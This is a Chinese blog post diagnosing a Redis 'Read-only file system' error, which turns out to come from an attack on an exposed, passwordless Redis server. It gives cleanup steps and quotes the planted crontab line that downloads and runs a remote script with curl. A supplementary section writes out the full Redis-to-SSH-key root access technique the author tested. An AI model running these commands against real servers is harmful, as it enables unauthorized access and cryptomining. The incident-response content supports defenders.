redis: Failed opening .rdb for saving: Read-only file system

最新推荐文章于 2024-05-15 11:40:15 发布
最新推荐文章于 2024-05-15 11:40:15 发布
阅读量3.8k 收藏 2
点赞数
分类专栏: redis 文章标签: redis 攻击 只读
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34326603/article/details/103294932
版权

 

# 1. 症状

 

系统: ubuntu 16.04

 

* redis部署完毕后,刚开始很正常,但是跑上一两天就会莫名其妙的出现redis连接异常的情况

查看日志,报错信息如下:

 

> 3684:M 14 Nov 16:47:22.666 * 1 changes in 900 seconds. Saving...

> 3684:M 14 Nov 16:47:22.666 * Background saving started by pid 4868

> 4868:C 14 Nov 16:47:22.670 * DB saved on disk

> 4868:C 14 Nov 16:47:22.670 * RDB: 0 MB of memory used by copy-on-write

> 3684:M 14 Nov 16:47:22.766 * Background saving terminated with success

> 3684:M 14 Nov 16:47:22.794 # Failed opening .rdb for saving: Read-only file system

> 3684:M 14 Nov 17:02:23.054 * 1 changes in 900 seconds. Saving...

> 3684:M 14 Nov 17:02:23.054 * Background saving started by pid 8041

> 8041:C 14 Nov 17:02:23.054 # Failed opening .rdb for saving: Read-only file system

 

前边还能正常写入,忽然就写入不了只读了(磁盘空间,内存占用都很低),检查存储文件`/var/lib/redis/dump.rdb` 文件权限正常,redis目录的权限也正常

 

# 2. 查找过程

翻阅各种帖子,有说redis被攻击的帖子,提醒了我。

查看了一下运行时redis的配置信息

```shell

root@instance-7w5yob14:~# redis-cli

127.0.0.1:6379> config get dir

1) "dir"

2) "/var/spool/cron"

127.0.0.1:6379> 

```

!!!还真的是被改掉了, `/var/spool/cron` 这个计划任务的目录,是`root`用户的权限,`redis`用户当前没法写了

 

网上搜一下,发现也有其他人被redis攻击了,植入`crontab`计划任务,变成了矿机

 

# 3. 解决问题

1. 增加redis 6379 端口的安全组限制,不让外部访问(我这是测试服,没有加限制,就悲剧了)

2. 检查计划任务是否已经被篡改了, 命令:`crontab -l`

  --> 我靠,还真有(`*/15 * * * * curl -fsSL xx.xx.xx.xx:7770/ash.sh|sh`)

  赶紧去掉吧。 直接删除 `/var/spool/cron/crontabs/` 下边的文件,这里边是命令写入的计划任务。

  然后重启crontab服务,命令:`service cron restart`

3. 检查 `/etc/cron.d`,以及 `/etc/crontab`,检查一下

   --> 我靠,这也被改了,而且还多了其他文件。删掉删掉,然后找个正常的服务器,拷贝正常的文件上来吧。然后重启crontab服务,命令:`service cron restart`

4. 计划任务全部干掉之后,再来看看被植入的脚本都干了啥。其中比较关键的是把rsa公钥写入了root用户下,从而获取到了root用户的权限,然后挖矿。赶紧删掉:`rm /root/.ssh/authorized_keys`

    

# 4. 总结

问题出现的原因

1.使用redis

2.没有设置redis密码

3.对外开放了6379端口

因为是测试服,所以没加限制,碰到了这种情况。 被人扫描端口,植入了脚本,变成了矿机。

 

 

补充:如何通过redis来植入计划任务,进而下一步木马程序的?

下边截取一段代码:

cd ~/.ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")> key.txt

其中,前后加入空行,是关键
cat key.txt | redis-cli -h xx.xx.xx.xx -x set key
redis-cli -h xx.xx.xx
#查看靶机Redis备份路径
CONFIG GET dir
#修改靶机Redis备份路径
CONFIG SET dir /root/.ssh
#设置备份文件的名称为authorized_keys
CONFIG SET dbfilename authorized_keys
#检查是否更改成功
CONFIG GET dbfilename
#保存
save
ssh root@xx.xx.xx.xx

基本思路是修改数据库存储文件名字为 root,然后修改redis的数据保存路径 dir ,然后把秘钥写入字段,保存为authorized_keys文件

我测试了一下写入 /root/.ssh/authorized_keys 公钥,从而获取root权限的方式。这里边有个点,就是redis保存的文件内容,上边会带有一些特殊字符的字符串,这里通过把正确的公钥前后加上空格,让其作为三行内容,中间一行是有效的

 

REDIS0006þ^@^@^CkeyA<9b>


ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCa4xWwyONOhpdNxTU97R7bf++2+SKAPEY4PEUwadyDBQeVz5AOzuAef0O2vT/JoKQR6RUNEv/Uy+fwrdlmGT7Nu0LUonnvLQt4mn5qPro3viiNegwVuYbIdDPGOD1WNvWQAQQQwwoHAEinJAUYg9bOcgzTzZdCIJsAYGxeD6RPU92YaROx/2+JfujAkifrqid2hh7xiiTW9NjHtxm61b36VtGtpXkkgqg4PQzbpUugifC2E+VgKvCaa/5Tp9aTyezHxy6cKsmVV3LNuSZu80yYIqTsAK5SbZzXe0WdZzXlwpMFOM7AfoTdS0llfjaz/ETIDEG2h8aw0gnfT3Rpb6IX wlg@wlg-virtual-machine

^@^AaÁg+^@
dbfilename^Drootÿ/OÜ<87>1>  ^A

 

攻击前提:

1.6379端口对外开放

2.没有加redis密码

3.使用root用户 启动了redis-server,没有使用 server redis 服务启动redis(这里有个分支,如果使用server 服务命令来启动,那么redis进程就归属于 redis用户,没有root的权限。 修改完dir路径后,也没有权限写入  --》 这样redis日志就会报错,提示 Read-only file system 了)

光1314光
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
redis的 dump.rdb 文件
12-11
dump.rdb---
Redis for Windows 5.0.14.1
04-27
redis 5.0.14.1 资源打包,方便小伙伴们下载。 压缩文件包含 1.Redis-x64-5.0.14.1.msi 2.Redis-x64-5.0.14.1.zip 3.Source code (zip) 4.Source code (tar.gz)
redis 报错:Failed opening the RDB file dump.rdb
m0_69285071的博客
11-08 1342
RDB 文件是 Redis 数据库的持久化文件,包含了保存在 Redis 中的数据。Redis 版本不兼容:请确认使用的 Redis 版本与生成 RDB 文件的 Redis 版本兼容。文件权限问题:检查文件的权限是否正确设置,确保你有足够的权限打开和读取该文件。你可以尝试修改文件的权限以确保你有访问权限。如果文件不存在,可以尝试检查文件路径是否正确,并确认是否有权访问该文件。文件损坏:如果文件已损坏,尝试进行修复。当然可以修改配置文件中的工作目录为权限足够的,在打开redis;文件不存在:请确保指定的。
redis更改config set dir后save报错问题解决 报错为: Failed opening .rdb for saving: Read-only file system
weixin_45805993的博客
12-16 2204
Stack Overflow牛批,CSDN上找了一周都找到解决办法 具体来说就是要改/etc/systemd/system/redis.service这个配置文件 这个配置文件中有一些关于redis允许读和写的目录,把你想允许他写的目录放在ReadWriteDirectories=后面就好了 其次权限给满,能想到的都给777 像/etc/redis /var/lib/redis, 再加root启动应该 就行了!! 参考链接https://stackoverflow.com/questions/44814.
云服务器上Redis数据库被攻击实录+总结
最新发布
青衫客36的博客
05-15 1002
通过以上步骤,可以详细了解攻击过程,并采取有效的措施防止类似攻击的发生。增强 Redis 服务器和系统的安全性是关键,确保只有受信任的用户能够访问和管理服务器。计划任务格式:计划任务的格式是一个定时器表达式后跟执行命令。这条任务每 15 分钟执行一次curl命令下载并执行远程脚本。文件路径:攻击者将 Redis 配置为将数据持久化到cron计划任务目录,如。这导致持久化的内容成为cron守护进程的一部分计划任务。持久化机制的滥用:通过 Redis 的SAVE。
Failed opening .rdb for saving: Permission denied
LeeKwen的专栏
04-22 1152
查看redis.log,出现的具体错误如下: 1127:M 22 Apr 10:50:05.195 # Background saving error 12479:C 22 Apr 10:50:11.010 # Failed opening .rdb for saving: Permission denied 1127:M 22 Apr 10:50:11.109 # Background sa...
linux ls目录只读,linux – 打开RDB文件失败…只读文件系统
weixin_32921593的博客
04-29 168
我正在尝试在我的redis实例上执行save或bgsave以运行备份/恢复过程.我尝试保存时遇到错误:532:M 28 Jun 23:58:30.396 # Failed opening the RDB file backup.rdb (in server root dir /var/lib/redis) for saving: Read-only file system/ var / lib /...
failed opening the rdb file crontab问题及解决方法
热门推荐
zhangjunli的博客
01-03 1万+
最近在向redis中写入数据的时候,报了下面的错误: failed opening the rdb file crontab (in server root dir /etc) for saving read-only file system 看表面上的意思是: 打开rbd file crontab失败,因为保存只读文件系统。 所以理解应该是执行进程对/etc文件目录的权限不足导致的 ...
WeihanLi.Redis:用于StackExchange.Redis,CacheRedlockCounterRateLimiterRankRedisEventBus的RedisExtensions
05-24
WeihanLi.RedisBuildIntroRedisExtensions for StackExchange.Redis, much more easier for generic opeartions,and supply some extensions for your business logics.StackExchange.Redis 扩展,更简单的泛型操作...
redis-server:5.0.14.1 windows版本
01-04
4. **持久化**: Redis通过两种方式实现数据持久化:RDB(快照)和AOF(Append Only File)。RDB会在指定时间间隔创建数据库的快照,而AOF则记录所有写操作日志,以在重启后重播这些操作恢复数据。 5. **主从复制**:...
redis5离线安装文件包,包含redis-5.0.14.tar.gz和redis-4.6.0.gem
06-10
redis-5.0.14/src/redis-cli --cluster create 192.168.129.98:7000 192.168.129.99:7003 192.168.129.99:7002 192.168.129.126:7005 192.168.129.126:7004 192.168.129.98:7001 --cluster-replicas
Redis-x64-5.0.14.msi和Redis-x64-5.0.14.zip
12-20
解压后,你可以找到包括`redis-server.exe`、`redis-cli.exe`等在内的可执行文件,以及配置文件`redis.conf`。这种方式适合于需要自定义配置或手动管理服务的用户。通过编辑`redis.conf`,你可以调整Redis的各项参数...
redis-6.2.12可执行安装包
06-06
5. AOF持久化:Append Only File模式保证了数据安全性,6.2.12版本在AOF重写上进行了优化,降低了磁盘占用。 三、Redis集群搭建与管理 `redis-6.2.12-cluster`这个文件可能包含了搭建Redis集群所需的所有文件,包括...
redis-rdb-tools-master的安装与简单使用.zip
10-15
为了方便管理和维护Redis的数据,开发者设计了一系列的工具,其中`redis-rdb-tools`是一个专门用于分析RedisRDB(持久化文件)的工具集。RDBRedis默认的持久化方式之一,它会定期将内存中的数据快照保存到磁盘上...
Redis稳定版 Redis-x64-5.0.14.1.zip
07-21
2. **持久化**: Redis提供了两种主要的持久化方式:RDB(快照)和AOF(Append Only File)。RDB会在指定时间间隔创建数据库的快照,而AOF则记录所有写操作,确保在服务器重启后能恢复到最新的状态。 3. **主从复制*...
redis 无法启动 遇到的Can‘t open the append-only file Permission
weixin_42221254的博客
07-06 1762
redis 无法启动 遇到的Can’t open the append-only file Permission 1、检查下data/下的文件,appendonly.aof设置为可读写 2、检查启动用户 3、重新启动
linux 安装redis安装,linux下安装redis与启动,及后台启动redis
weixin_30030437的博客
05-14 192
1.将下载好的压缩包放到/usr/local目录下# tar xzf redis-3.0.2.tar.gz# cd redis-3.0.2# make提示错误 make: cc: Command not found make: *** [adlist.o] Error 127没有安装gcc环境,需要安装gcc# yum install gcc安装后检查是否安装成功# rpm -qa |grep g...
Redis
weixin_44168526的博客
04-13 928
文章主要总结了redis的一些应用场景及常用的使用命令,并包括持久化策略、主从复制、集群模式、分布式锁的实现、作为缓存时的使用注意事项及部分源码解析等内容
./src/redis-cli --cluster create 10.17.75.221:16379 10.17.75.227:16379 10.17.75.230:16379 --cluster-replicas 1 --port 16380 Unrecognized option or bad number of args for: '--port'
07-15
根据你提供的命令,使用redis-cli创建Redis集群时出现了错误。错误信息显示 `Unrecognized option or bad number of args for: '--port'`,这说明 `--port` 选项无法被识别,或者参数传递错误。 在Redis 6.0及更高...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值